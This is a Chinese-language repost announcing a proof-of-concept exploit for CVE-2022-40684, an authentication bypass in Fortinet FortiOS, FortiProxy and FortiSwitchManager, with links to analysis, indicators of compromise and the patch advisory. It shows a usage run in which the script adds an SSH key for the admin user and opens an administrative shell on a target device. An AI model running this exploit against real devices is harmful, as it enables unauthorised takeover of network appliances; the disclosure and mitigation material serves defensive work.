关于CVE-2022-40684 的概念验证影响 Fortinet FortiOS、FortiProxy 和 FortiSwi
2022-11-24 21:7:49 Author: Ots安全(查看原文) 阅读量:18 收藏
2022-11-24 21:7:49 Author: Ots安全(查看原文) 阅读量:18 收藏
影响 Fortinet FortiOS、FortiProxy 和 FortiSwitchManager 设备的 CVE-2022-40684 的 POC。
技术分析
漏洞的技术根本原因分析可以在我们的博客上找到: https ://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684
妥协指标
要分析 Fortinet 日志以获取妥协指标以及如何启用更深入的日志,请查看我们的 IOC 博客: https ://www.horizon3.ai/fortinet-iocs-cve-2022-40684/
概括
该 POC 滥用身份验证绕过漏洞为指定用户设置 SSH 密钥。
用法
[email protected]kali:~# python3 CVE-2022-40684.py -t 10.0.40.67 --username admin --key-file ~/.ssh/id_rsa.pub[+] SSH key for admin added successfully![email protected]kali:~# ssh [email protected]10.0.40.67fortios_7_2_1 #config Configure object. getGet dynamic and system information. showShow configuration. diagnoseDiagnose facility. executeExecute static commands. aliasExecute alias commands. exitExit the CLI
缓解措施
更新到最新版本或按照 Fortinet PSIRT 中的说明进行缓解
https://www.fortiguard.com/psirt/FG-IR-22-377
项目地址:https://github.com/horizon3ai/CVE-2022-40684
文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjYyMzkwOA==&mid=2247496087&idx=2&sn=edfd839544a05375dcf39dfa749b1d35&chksm=9badb8dcacda31ca0b5db26f75756bc88bd067d0d9c9e4ea59dccd1bedccea504f5b1c1a52f1#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh